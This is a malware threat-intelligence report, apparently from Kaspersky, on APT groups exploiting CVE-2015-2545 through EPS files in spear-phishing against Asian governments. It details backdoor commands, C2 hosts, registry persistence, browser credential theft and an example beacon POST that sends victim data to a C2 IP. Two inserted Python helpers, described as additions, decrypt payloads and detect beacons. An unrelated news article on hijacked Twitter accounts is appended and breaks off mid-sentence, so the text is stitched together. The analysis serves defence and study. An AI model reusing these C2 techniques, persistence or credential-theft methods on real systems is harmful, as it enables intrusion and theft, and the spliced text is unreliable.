CVE-2015-2545: overview of current threats

CVE-2015-2545 is a vulnerability discovered in 2015 and corrected with Microsoft’s update MS15-099.

The vulnerability affects Microsoft Office 2007 SP3, 2010 SP2, 2013 SP1 and 2013 RT SP1. The flaw allows an attacker to execute arbitrary code using a specially crafted EPS image file.

The exploit uses PostScript and can evade Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods. The exploit was discovered in the wild in August 2015, when it was used in a targeted attack by the Platinum group, presumably against targets in India. Over the following months, there was significant growth in the number of threat actors using the vulnerability as a primary tool for initial penetration, with both the attack groups and their targets located in South-East and Central Asia and the Far East. In this research paper, we discuss examples of attacks using the CVE-2015-2545 vulnerability undertaken by some of these groups.

Overview of groups using CVE-2015-2545

Platinum (also known as TwoForOne)

The group is believed to originate from South-East Asia. Its attacks can be traced as far back as 2009.

The group is notable for exploiting 0-day vulnerabilities and carrying out a small number of highly focused targeted attacks – mostly against government agencies in Malaysia, Indonesia, China and India. This group was the first to exploit the CVE-2015-2545 vulnerability.

After the vulnerability was corrected with Microsoft updates in September and November 2015, no new Platinum attacks exploiting this vulnerability have been detected. Microsoft presented the activity of this group at the SAS conference in February 2016, and in its paper: PLATINUM: Targeted attacks in South and Southeast Asia.

APT16

The group has been known for several years and is believed to be of Chinese origin. In November and December 2015, it used a modified exploit for CVE-2015-2545 in attacks against information and news agencies in Taiwan.

These attacks were described in a FireEye research paper – The EPS Awakens – Part 2.

EvilPost

In December 2015, Kaspersky Lab became aware of a targeted attack against the Japanese defense sector. In order to infect victims, the attacker sent an email with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office using an embedded EPS (Encapsulated Postscript) object.

The EPS object contained a shellcode that dropped and loaded a 32-bit or 64-bit DLL file depending on the system architecture.

This, in turn, exploited another vulnerability to elevate privileges to Local System (CVE-2015-1701) and download additional malware components from the C&C server. The C&C server used in the attack was located in Japan and appears to have been compromised. However, there is no indication that it has ever been used for any other malicious purpose. Monitoring of the server activity for a period of several months did not result in any new findings. We believe the attackers either lost access to the server or realized that it attracted too much attention from security researchers, as the attack was widely discussed by the Japanese security community.

According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached. This document embedded an EPS object file, which triggered a vulnerability in the EPS format handler in Microsoft Word.

Even with an exploit component, Microsoft Word rendered the document correctly and displayed the decoy message.

The document is written in good Japanese, as shown below. It uses New Year impressions from defense-related organizations as its decoy content. This attack was also described in the FireEye report mentioned above. An overview of the activity of the EvilPost group was provided to subscribers of the Kaspersky Lab Threat Intelligence Service in March 2016.

For information about the service, please write to intelreports@kaspersky.com.

SPIVY

In March and April 2016, a series of emails laced with an exploit for CVE-2015-2545 were detected.

The emails were sent in spear-phishing attacks, presumably targeting organizations in Hong Kong.
Identifying a specific group behind these attacks is difficult because they used a new variant of a widely available backdoor known as PoisonIvy (from which the name of the group, SPIVY, is derived).

A description of these incidents can be found in the PaloAlto blog.

Danti and SVCMONDR

These two groups have not yet been publicly described.

An overview of their attacks and the tools used is provided in this report.

Danti attacks

Danti (Kaspersky Lab’s internal name) is an APT actor that has been active at least since 2015, predominantly targeting Indian government organizations.

According to our telemetry, Danti has also been actively hitting targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines. The group implemented a new campaign in February and March 2016, using a repurposed implementation of the CVE-2015-2545 exploit with custom shellcode.
In order to infect the victim, the attackers distributed spear-phishing emails with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office.

The exploit is based on a malformed embedded EPS (Encapsulated Postscript) object.

This contains the shellcode that drops a backdoor, providing full access to the attackers.

Main findings:

- Danti, a previously unknown group, is probably related to NetTraveller and DragonOK
- In February-March 2016 the group was observed using CVE-2015-2545
- It remains active, conducting attacks against Indian diplomatic organizations
- Related attacks have been observed against Central and South East Asia targets

The campaign leveraging the exploit for CVE-2015-2545 took place in February 2016.

As a result, several emails with attached DOCX files were uploaded to VirusTotal.

The email recipients were connected to the Indian Ministry of External Affairs, as can be seen below:

- dsfsi@nic.in, the Foreign Service Institute, Ministry of Foreign Affairs (Under Secretary (FT/NRG), dsfsi@mea.gov.in)
- chumarpost@gmail.com, possibly related to the Chumar military post in India, a disputed area between India and China (the mail server is the same as that of the Indian Ministry of Foreign Affairs: vastuXX.nic.in)
- chancery@indianembassy.hu, the Indian embassy in Hungary
- amb.copenhagen@mea.gov.in, the Indian embassy in Denmark
- amb.bogota@mea.gov.in, the Indian embassy in Colombia

All these attacks took place between the 2nd and 29th of February, 2016.

Target                      Date           Attachment name                    Sender
Indian embassy in Hungary   2nd February   Mission List.doc                   unknown (original email was forwarded)
Indian embassy in Denmark   2nd February   HQ List.doc                        mout.gmx.com ([74.208.4.200])
Indian embassy in Colombia  2nd February   HQ List.doc                        mout.gmx.com ([74.208.4.201])
DSFSI                       24th February  India’s 10 Top Luxury Hotels.doc   191.96.111.195 via mout.gmx.com ([74.208.4.201])
Chumarpost                  29th February  India’s 10 Top Luxury Hotels.doc   43.227.113.129 via mout.gmx.com ([74.208.4.200])

In the case of the Indian Embassy in Hungary, it looks like the original message was forwarded from the embassy to the Indian IT security team in the Ministry of Foreign Affairs, and uploaded later to VirusTotal.

Initial vector

The emails that were analysed had originally been sent via “3capp-mailcom-lxa06.server.lan”, perhaps using a spam-mailer program. In all known cases, the sender used the same gate at 74.208.4.200/74.208.4.201 (mout.gmx.com), a well-known open relay SMTP server. The email messages changed for different waves of the campaign. When the campaign started on 2nd February, the emails carried the subject headers “Mission List” and “HQ List”, and forged the identity of a real sender.

[Figure: original message used in the first wave of attacks]

As can be seen above, the original email was supposedly forwarded from Anil Kumar Balani, Director of the Department of Information Technology at the Indian Ministry of Communications & Information Technology.

[Figure: Mission List decoy document]

At the same time, attackers sent a slightly different document with the subject “HQ List” to other Indian embassies (for example, those in Denmark and Colombia):

[Figure: original HQ List email]

K.Nagaraj Naidu is Director of the Investments Technology Promotion Division in the Ministry of External Affairs, and a former Counsellor (T&C) at the Embassy of India in China.

[Figure: HQ List decoy document]

Both files (“Mission List” and “HQ list”) have different decoy content, but both use the same CVE-2015-2545 EPS exploit (image1.eps, MD5 a90a329335fa0af64d8394b28e0f86c1). Interestingly, as can be seen in their metadata, both files were modified by the user “India” on 01.02.2016, just one day before they were sent to targets.

[Figure: “HQ List” metadata]
[Figure: “Mission List” metadata]

For the attacks at the end of February, the attackers decided to use the less relevant subject header of “10 top luxury hotels in India”, sent from an unknown sender.

[Figure: Top Luxury Hotels spear-phishing email]

This new attachment contains the same EPS exploit, but uses a different decoy document and a new payload.

[Figure: Top 10 Luxury Hotels decoy document]

The text of the document was copied from a Forbes article published in 2007.

According to its metadata, the document was created in June 2015, so it has probably been used before in unknown attacks. However, the same mail gate (mout.gmx.com) was used as in the 2nd February attacks.

[Figure: email header from February 29]
[Figure: email header from February 24]

All the “doc” files are Web Archive Files and contain decoy documents and a malicious EPS.

The structure of the WAF files is the same in all three cases:

[Figure: Web archive structure]

Exploit

The attackers used at least one known 1-day exploit: the exploit for CVE-2015-2545, an EPS parsing vulnerability in the EPSIMP32.FLT module, reported by FireEye and patched by Microsoft on 8 September 2015 with MS15-099. We are currently aware of about four different variants of the exploit. The original one was used in August 2015 against targets in India by the Platinum (TwoForOne) APT group.

[Figure: original EPS exploit, used in August 2015]

The second (which is a modified variant of the original exploit) was used in EvilPost attacks against Japan in 2015, and then reused by cybercriminals in March 2016.

This variant was also used by the APT16 group (ELMER backdoor) in Taiwan in December 2015.

The second variant is easily recognized by the specific strings in its EPS shellcode:

[Figure: the “h:\\test.txt” string could have been forgotten by the exploit developer]

The third variant was used in December 2015 against a Taiwanese organization, and in February 2016 against an Indian diplomatic organization.

This variant uses different shellcode but is based on the original exploit from the Platinum (TwoForOne) APT:

[Figure: can be recognized by the “add2 <eb135” substring]

In the third variant, the binaries with the encrypted malicious exe file and the decoy document can be found at the end of the files. The binary starts with “PdPD” (50 64 50 44), a marker previously used for encrypted binaries by a number of APT groups (Anchor Panda, Samurai Panda, Temper Panda).

[Figure: encrypted data at the end of the eps file]

The decryption function is a 1-byte XOR with a key from “\x00” to “\xff”, plus the replacement of odd bytes by even bytes in the first several hundred bytes of the header.

[Figure: decrypted exe file]
[Figure: decrypted decoy document]

We detected a few different EPS objects in the exploit and these are analyzed below.
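As an added example (not code from the report), the following Python helper turns the decryption procedure described above into a defender's carving tool: it locates the “PdPD” marker in an EPS object, brute-forces the 1-byte XOR key over all 256 values and undoes the odd/even byte swap in the header, accepting only candidates with a valid MZ/PE header. The 512-byte swap length and the constructed sample EPS are assumptions; the swap is implemented as exchanging adjacent byte pairs.

```python
import struct
from typing import Optional, Tuple

PDPD_MARKER = b"PdPD"      # 50 64 50 44, the marker preceding the encrypted binary
HEADER_SWAP_LEN = 512      # assumption: "several hundred bytes" of odd/even swapping


def unswap_header(data: bytes, n: int = HEADER_SWAP_LEN) -> bytes:
    """Undo the odd/even byte replacement applied to the first n bytes.
    Exchanging adjacent pairs is its own inverse, so the same function encrypts."""
    head = bytearray(data[:n])
    for i in range(0, len(head) - 1, 2):
        head[i], head[i + 1] = head[i + 1], head[i]
    return bytes(head) + data[n:]


def xor_single_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE validation: MZ signature and a PE\\0\\0 header at e_lfanew.
    A bad e_lfanew (wrong key) simply slices past the end and fails the check."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def carve_pdpd_payload(eps: bytes) -> Optional[dict]:
    """Find the PdPD-marked blob appended to an EPS object and recover the
    embedded executable by trying every 1-byte XOR key, with and without the
    header byte swap. Returns the key, whether the swap was needed and the PE."""
    idx = eps.rfind(PDPD_MARKER)          # the blob sits at the end of the file
    if idx < 0:
        return None
    enc = eps[idx + len(PDPD_MARKER):]
    for key in range(256):
        plain = xor_single_byte(enc, key)
        for candidate, swapped in ((plain, False), (unswap_header(plain), True)):
            if looks_like_pe(candidate):
                return {"key": key, "swapped": swapped, "payload": candidate}
    return None


def constructed_sample(key: int = 0x5A) -> Tuple[bytes, bytes]:
    """Constructed test data (not a real sample): a minimal PE-shaped blob,
    header-swapped and XOR-encrypted, appended to a stub EPS after 'PdPD'."""
    pe = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)
          + b"PE\x00\x00" + b"\x90" * 60)
    enc = xor_single_byte(unswap_header(pe), key)
    eps = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n/x 1 def\n"
           + PDPD_MARKER + enc)
    return eps, pe


if __name__ == "__main__":
    eps, original = constructed_sample()
    result = carve_pdpd_payload(eps)
    print(hex(result["key"]), result["swapped"], result["payload"] == original)
```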

The fourth variant of the exploit is analyzed in the “March attack” section. Read more about EPS objects and their payload in the Appendix.

March attack

At the end of March 2016, we discovered a new wave of attacks by the Danti group against Indian governmental institutions. On March 28th, several malicious documents were sent to various recipients at the Cabinet Secretariat of the Government of India from the email account of Ms. Richa Gaharwar (<richa.gaharwar@nic.in>), Deputy Secretary at the Department of Administrative Reforms and Public Grievances, the nodal agency of the Government of India.

[Figure: email sent from the account of Ms. Richa Gaharwar]

The message was sent from an internal IP address using Oracle Communications Messenger.

This could mean that the employee workstation used to send the malicious emails had been fully compromised.

[Figure: email header]

The attachment contains the file “Holidays in India in 2016.docx” with the embedded EPS exploit.

This time the attackers used the second variant of the exploit (previously used by the EvilPost and APT16 groups), with minor changes:

- They removed the part with the “h:\\test.txt” strings
- They added the binary at the end of the EPS object (the same as in the third variant of the exploit)
- Instead of using the “PdPD” string as a marker for the binary, they used a new identifier: “1111111122222222”

[Figure: new identifier used]

All these changes created a new variant of the exploit, detected by very few antivirus products. The decoy document was created on January 27th, and then modified by adding the EPS exploit on March 28th, right before the attack.

[Figure: decoy document]

According to its metadata, the document was created and modified by Chinese users:

[Figure: decoy’s metadata]

March attack – payload

The dropped file is a RarSFX archive (331307 bytes).

According to comments in the archive, this was also created by a Chinese user.

The dropper installs four files in the system.

The “Appinfo.dat” file launches “PotPlayerMini.exe”, monitors the memory periodically with the GlobalMemoryStatus API function and writes the results to “C:\windows\memstatus.txt”.

The main loader “PotPlayerMini.exe” is a legitimate multimedia player from Daum Communication.

The file is signed with a legitimate signature from “Daum Communications Corp.”

[Figure: digital signature information]

This legitimate file is used by the attackers to load a malicious, unsigned file from the same folder: PotPlayer.dll (the hardcoded PDB path inside is “C:\Users\john\Desktop\PotPlayer\Release\PotPlayer.pdb”).

This, in turn, executes appinfo.dat (the hardcoded PDB path inside is “D:\BaiduYunDownload\ServiceExe\Release\ServiceExe.pdb”), which is a Yoda-compressed binary.

The backdoor code is stored inside update.dat.

The potplayer.dll “PreprocessCmdLineEx” export function:

- Creates a service named “MemoryStatus” with a path to the “appinfo.dat” file and sets it in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run with the name “potplayer”.
- Opens the “update.dat” file, decrypts it with xor operations and passes execution to the resulting buffer.

“update.dat”, a backdoor:

- Makes its first GET request to the hardcoded CnC “newsupdate.dynssl.com/index.html” in order to get the new CnC in the response. If a 407 response code is returned (Proxy authentication required), the sample sends the request again with the “proxyname” string as the proxy username and the “proxypass” string as the proxy password. This suggests that the sample may have been compiled using a builder where these parameters must be set manually, and in this specific sample they were not changed from the defaults.
- Finds the “8FC628C9F43D42E2B77C2801518AF2A5” substring and decrypts it using AES in CTR mode three times, with three 16-byte keys.
- Makes a POST request to the new CnC with the “im=validate” URL parameter and expects the “success” string as the response.
- Forms the following structure, which is AES-encrypted and sent to the CnC in a POST request:
  - the “CFB4CDE8-9285-4CC2-ACE2-CD9CCDF22C0D” string
  - Local IP
  - Host name
  - 0x3E9 dword
  - OS version
  - SYSTEM_INFO structure
- Decrypts the response using AES with one key.

Commands:

- Passes execution to the new buffer
- Enumerates drives and their type
- Enumerates the given registry key and value
- Enumerates processes
- Deletes the given file
- Creates the given process
- Writes to a file and launches it
- Enumerates services
- Terminates the given process
- Provides a shell via cmd.exe

The malware connects to the following C2s:

- newsupdate.dynssl.com (103.61.136.120)
- dnsnews.dns05.com (118.193.12.252)

[Figure: the connection]

The two hosts are dynamic DNS subdomains, using the provider CHANGEIP DNS.

SVCMONDR: the Taiwan case

In December 2015, we uncovered another example of the type of shellcode found in the exploit for CVE-2015-2545. On 11 December, a spear-phishing email was sent by attackers to an employee of a Taiwanese security software reseller.

[Figure: spear-phishing email]

The attachment contained a Web Archive File with “1-3說明檔.doc” and a malicious EPS file inside.

[Figure: “1-3說明檔.doc”]

This EPS (98c57aa9c7e3f90c4eb4afeba8128484) is an exploit for CVE-2015-2545 and contains an encrypted binary starting with “PdPD” (50 64 50 44), the same as seen in the Danti attacks. The structure of the Web Archive also carries references to the same files as the Danti group (image002.gif and “image002.eps”). However, the files themselves are absent from the archive.

[Figure: part of the Web Archive]

This resemblance could mean that we can attribute this case to the Danti group. However, it could also be a coincidence or yet another case of different groups using the same malicious code.

That’s why we are noting this incident separately from the Danti group’s activity. Interestingly, in the first few days of December, another group – APT16 (FireEye’s classification) – also targeted Taiwan-based organizations with a CVE-2015-2545 EPS exploit, and its emails originated from the same domain as the one sent by the SVCMONDR attackers. However, it used another type of shellcode and a different backdoor – ELMER.

After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b). This queries the registry values “HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings” and “HKCU\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Connections\DefaultConnectionSettings” and compares them. If they don’t coincide, it copies the “DefaultConnectionSettings” value from the HKEY_USERS key to the HKCU key. It also copies the values taken from:

- HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022C854F}
- HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C80120}
- HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10

to the corresponding HKCU keys (for example: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022C854F}, etc.). It then forms a structure to send to the CnC in a POST request, with the following fields:

- 0x8888 constant
- 0x8000 constant
- 18-byte hex string based on the CoCreateGuid function
- Local IP
- MAC address

It encodes the resulting structure with base64.

Example of a POST request:

    POST / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: 59.188.13.204:9080
    Content-Length: 112
    Connection: Keep-Alive
    Cache-Control: no-cache

    AAAAAIiIAAAAgAAAAAAAAGQwNTRlYTkxMDAwMGEyZmU3NAAAAAAAAAAAAAAAAAAAMTAuNjMuMTIuNAAAAAAAADAwMEMyOUU5Nzg2QgAAAAAAAAAA

Based on the CnC response, the sample:

- Checks the password in the CnC response and compares it with the hardcoded password “1010” in its configuration structure. If the password is valid, it sets a “certified” flag and can further process the following commands.
- Launches the given command line with ShellExecute, writes the output to a %tmp% file, sends the results to the CnC and deletes the file.
- Downloads a file to the %Temp% folder.
- Uploads the given file to the CnC.
- Sets the sleep interval.

All results sent to the CnC after processing commands are encrypted with RC4, with the MAC address as the key. The CnC points to an IP address in Hong Kong.
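As an added example (not code from the report), this Python helper decodes the 84-byte SVCMONDR check-in body shown above and splits it into the fields the report lists, which is what a defender needs to turn the request into a detection rule or to triage a capture. The fixed field widths (four dwords, a 32-byte GUID-derived string, a 16-byte IP and a 20-byte MAC) are inferred from the decoded sample and are an assumption.

```python
import base64
import struct
from typing import Optional

# Body of the report's example POST request, base64 exactly as sent on the wire.
SAMPLE_BODY_B64 = (
    "AAAAAIiIAAAAgAAAAAAAAGQwNTRlYTkxMDAwMGEyZmU3NAAAAAAAAAAAAAAAAAAA"
    "MTAuNjMuMTIuNAAAAAAAADAwMEMyOUU5Nzg2QgAAAAAAAAAA"
)

# Field layout inferred from the decoded sample (assumption, not stated in the report):
# dword reserved, dword 0x8888, dword 0x8000, dword reserved,
# 32-byte NUL-padded hex id, 16-byte NUL-padded local IP, 20-byte NUL-padded MAC.
BEACON_STRUCT = struct.Struct("<4I32s16s20s")   # 84 bytes in total
MAGIC_1, MAGIC_2 = 0x8888, 0x8000
SVCMONDR_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)"


def _cstr(raw: bytes) -> str:
    """Return a NUL-padded field as text."""
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def parse_beacon(body_b64: str) -> Optional[dict]:
    """Decode one check-in body; returns None if it is not SVCMONDR-shaped."""
    try:
        raw = base64.b64decode(body_b64, validate=True)
    except ValueError:               # binascii.Error is a ValueError subclass
        return None
    if len(raw) != BEACON_STRUCT.size:
        return None
    _, c1, c2, _, guid, ip, mac = BEACON_STRUCT.unpack(raw)
    if (c1, c2) != (MAGIC_1, MAGIC_2):
        return None
    return {"guid_hex": _cstr(guid), "local_ip": _cstr(ip), "mac": _cstr(mac)}


def is_svcmondr_checkin(headers: dict, body_b64: str) -> bool:
    """Detection rule over a proxy/IDS record: the hard-coded MSIE 6.0/Win32
    User-Agent plus an 84-byte base64 body carrying the 0x8888/0x8000 constants."""
    ua = headers.get("User-Agent", "")
    return ua == SVCMONDR_UA and parse_beacon(body_b64) is not None


if __name__ == "__main__":
    print(parse_beacon(SAMPLE_BODY_B64))
    print(is_svcmondr_checkin({"User-Agent": SVCMONDR_UA}, SAMPLE_BODY_B64))
```

The decoded MAC begins with 00:0C:29, a VMware OUI, so the request in the report was most likely captured from a virtual machine rather than a victim workstation.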

This IP address belongs to a local private company, but falls within a range of IP addresses that belong to another enterprise that has already been identified as a host location for command and control servers that communicate with malware. The CnC has been used in other APT incidents, attributed by FireEye to the group “admin@338” aka “Temper Panda” (59.188.0.197, accounts.serveftp.com). In general, this IP address space from “New World Telecom HK” is one of the favorite places used by different Chinese-origin APT groups to host command & control servers/proxies. Another detail suggesting a possible relationship between SVCMONDR and Temper Panda is the use of the “PdPD” (50 64 50 44) marker for encrypted binaries.

According to Crowdstrike, the same marker has been used previously by a number of APT groups (Anchor Panda, Samurai Panda and Temper Panda). The latest known activity of “admin@338” was in August 2015, when it targeted Hong Kong-based media using its own tools, LOWBALL and BUBBLEWRAP. However, we are unable to draw any conclusion regarding the relationship between the SVCMONDR group and Temper Panda. According to KSN data, in addition to Taiwan, there are some SVCMONDR victims in Thailand.

Conclusions

We are currently aware of at least four different APT actors actively using exploits of the CVE-2015-2545 vulnerability: TwoForOne (also known as Platinum), EvilPost, APT16 and Danti. These groups have their own toolsets of malicious programs.

Danti’s arsenal is more extensive than those of EvilPost and APT16, and in terms of functionality can be compared with Platinum.

All groups are focused on targets in the Asian region and have never been seen in incidents in Western Europe or the USA. The TwoForOne (Platinum) group is described in Microsoft research, APT16 in FireEye reports, and EvilPost and Danti in Kaspersky Lab private reports. Danti is highly focused on diplomatic entities.
It may already have full access to internal networks in Indian government structures.

According to Kaspersky Security Network, some Danti Trojans have also been detected in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines. Despite the fact that Danti uses a 1-day exploit, the group is able to make its own modifications to bypass current antivirus detections.

A number of the modules used by Danti have the same functionality as previously known and used malicious programs like NetTraveller and DragonOK. The use of CVE-2015-2545 exploits is on the rise.
In addition to the groups mentioned above, we have seen numerous examples of these exploits being used by traditional cybercriminals in mass mailings in February-April 2016.
Such attacks mostly target financial institutions in Asia.
Specifically, attacks have been recorded in Vietnam, the Philippines and Malaysia.

There are reasons to believe that Nigerian cybercriminals are behind these attacks.
In some cases, the infrastructure used is the same as the one we saw when analyzing the Adwind Trojan. We expect to see more incidents with this exploit, and we continue to monitor new waves of attacks and the potential relationship with other attacks in the region. To learn more about how to address the issue of known vulnerabilities properly, read this post in the Kaspersky Business Blog.

Additional references:

- The EPS Awakens – Part 1, Part 2
- Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets
- New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
- Microsoft research “Platinum”
- EvilPost attacks (Kaspersky Lab Private Report, March 2016)

Appendix A: EPS objects, their payload and http.exe trojan analysis

EPS objects

File MD5: a90a329335fa0af64d8394b28e0f86c1
File type: Encapsulated Postscript
File size: 189’238 bytes
File name: image001.eps (from HQ List)

This EPS file contains a shellcode that decrypts and saves the file “lsass.exe” and a decoy document to disk. The dropped malicious files are described below.

File MD5: 07f4b663cc3bcb5899edba9eaf9cf4b5
File type: Encapsulated Postscript
File size: 211’766 bytes
File name: image001.eps (from Mission List)

This EPS file contains a shellcode that decrypts and saves the file “lsass.exe” and a decoy document to disk. The dropped malicious files are described below.

File MD5: b751323586c5e36d1d644ab42888a100
File type: Encapsulated Postscript
File size: 398’648 bytes
File name: image001.eps (from India’s 10 Top Luxury Hotels)

This EPS file contains a shellcode that decrypts and saves the dropper file (Windows CAB) and a decoy document to disk. The dropper and the dropped malicious file “http.exe” are described below.
Payload analysis

Backdoor

File name: lsass.exe
MD5: 8ad9cb6b948bcf7f9211887e0cf6f02a
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Compilation timestamp: 2015-12-28 07:47:54
PE resources: BIN (CHINESE SIMPLIFIED)
Size: 138’240 bytes

URL: http://goback.strangled[.]net:443/[random string]
Type: POST
User agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Real IP: 180.150.227.135:443

Drops a file from its resource section to %ALLUSERSPROFILE%\IEHelper\mshtml.dll.

The backdoor then writes a string to a given offset with the value dependent on the %ALLUSERSPROFILE% environment variable. Thus, the md5 of dropped files can vary.

Examples of md5 with standard variables:

- be0cc8411c066eac246097045b73c282
- bae673964e9bc2a45ebcc667895104ef

Sets registry:

If the user is not admin:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersio\Run, value {53372C34-A872-FACF-70A7-A23C81C766C4} = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\IEHelper\mshtml.dll, IEHelper”

In any case:
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{53372C34-A872-FACF-70A7-A23C81C766C4}, value “StubPath” = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\IEHelper\mshtml.dll, IEHelper”

Sets the following values before creating the instance of IE for communicating with the CnC:

- HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = 1
- HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Check_Associations = ”no”
- HKEY_CURRENT_USER\Software\Microsoft\Internet Connection Wizard\Completed = 1
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEHarden = 0

Collects the following info, encodes it with base64 and sends it to the CnC:

- Memory status
- OS version
- User name
- OEM code page identifier
- Local IP
- CPU speed

Forms the following body in the POST request to the CnC:

    ----=_Part_%x
    Content-Disposition: form-data; name=”m1.jpg”
    Content-Type: application/octet-steam
    %base64%
    ----=_Part_%x

where %x is the adapter’s MAC address, decrypted with an xor operation. The URL path in the POST request is generated randomly with uppercase letters.

[Figure: example of CnC communication]

Based on the CnC response, the sample:

- Provides a shell via cmd.exe
- Creates a directory
- Lists files in a directory
- Deletes a file
- Uploads the given file to the CnC
- Enumerates drives, gets their type and available space
- Launches the given file
- Moves a file
- Writes and appends to the given file
- Uninstalls itself

File name: mshtml.dll
MD5: be0cc8411c066eac246097045b73c282 or bae673964e9bc2a45ebcc667895104ef or different
File type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Compilation timestamp: 2015-12-28 07:45:20
Size: 72’192 bytes

mshtml.dll repeats entirely the functionality of its dropper (CnC communication and command processing) in its “IEhelper” export and is built on the same source code.

http.exe trojan

MD5: 6bbdbf6d3b24b8bfa296b9c76b95bb2f | Sun, 13 Apr 2008 18:32:45 GMT

Drops a file to %Temp%\IXP000.TMP\http.exe and launches it.

File name: http.exe
MD5: 3fbe576d33595734a92a665e72e5a04f | Wed, 13 Jan 2016 10:25:10 GMT
CnC: carwiseplot.no-ip.org/news/news.asp

Sets registry:

- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, “IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, “IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe
- HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run, “IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe

Copies itself to %ALLUSERPROFILE%\Accessories\wordpade.exe, launches it and exits its own process.

The wordpade.exe file then:

- Creates the mutex “Global\wordIE”.
- Stores keystrokes and window titles in %Temp%\dumps.dat and xors the file with 0x99.
- Knocks to the CnC via an IE instance: carwiseplot.no-ip.org/news/news.asp
- Includes the following field in the HTTP header: Cookie: ID=1%x, where %x is the volume serial number of disk C

Based on the CnC response, the sample:

- Provides a shell via cmd.exe
- Lists files in all drives and writes the list to the given file
- Retrieves the OS version, local IP, installed browser, computer name and user name and writes them to the given file
- Writes to the given file
- Deletes the given file
- Uploads the given file to the CnC
- Makes screenshots and writes them to the file %Temp%\makescr.dat
- Retrieves proxy settings and proxy authentication credentials from Mozilla (signons.sqlite, logins.json) and Chrome files (%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data), Microsoft WinInet storage and Microsoft Outlook

Appendix B: Danti sample hashes

Appendix C: sample hashes of SVCMONDR attacks

2.5k Twitter Accounts Hacked To Spread Links To Adult Content

May 24, 2016

Hackers compromised 2,500 Twitter accounts to earn money through affiliate programs. Cyber crooks hijacked more than 2,500 Twitter accounts and used them to post links to adult content in an attempt to cash in on affiliate programs that pay for sign-ups. Symantec researchers spotted compromises of the accounts of an electrofunk band, an international journalist from The Telegraph, and other high profile individuals during the campaign, according to a May 23 blog post. The attackers often replaced the user's profile picture with that of a scantily clad woman, altered the bio to include links to adult sites, liked tweets, and followed users with the intent of luring those curious enough to investigate the recently altered profiles, the post said. “If a user visits the compromised profile, they will see tweets that claim to offer free sign-ups to watch ‘hot shows' over webcam, or dates and sexual encounters,” researchers wrote. The new tweets on the compromised page will contain sexually suggestive photos and shortened links, using either Bitly or Google's URL shorteners, and redirect users to the adult sites, according to the post.

The links also include an affiliate tag which identifies where traffic originates from. “The incentive for the attackers is to drive users to these adult dating websites with the intention of getting users to sign-up for these sites,” Symantec Senior Security Response Manager Satnam Narang told SCMagazine.com via emailed comments. “We estimate that each successful conversion is worth $4.00 per user.” Researchers noted that several of the compromised accounts were older accounts that were orphaned by their owners and had not sent new tweets in years.

The oldest account was registered in December 2007, 27 percent of compromised accounts were created in 2011, and 73 percent were at least four years or older, researchers wrote. “We suspect that the accounts were compromised as a result of weak passwords and password re-use, whereby passwords obtained from other breaches allowed attackers to gain access to these accounts,” Narang said. Giovanni Vigna, CTO and co-founder of cybersecurity firm Lastline, told SCMagazine he agreed. “They might have obtained username/password information from a breached music-exchange service and then simply tried the password combination against Twitter,” he said via emailed comments. Vigna said that a large portion of the compromised accounts being old and barely active further supported the claim. InfoArmor Chief Intelligence Officer Andrew Komarov contended the credentials came from organized attacks on web applications. “In many cases, they use such data for checking the affected users’ credentials across multiple online-services, including social network, in order to monetize it in more scalable way – just one pair of credentials may lead to 10-plus accounts on various services, including Twitter, e-commerce, instant messengers and 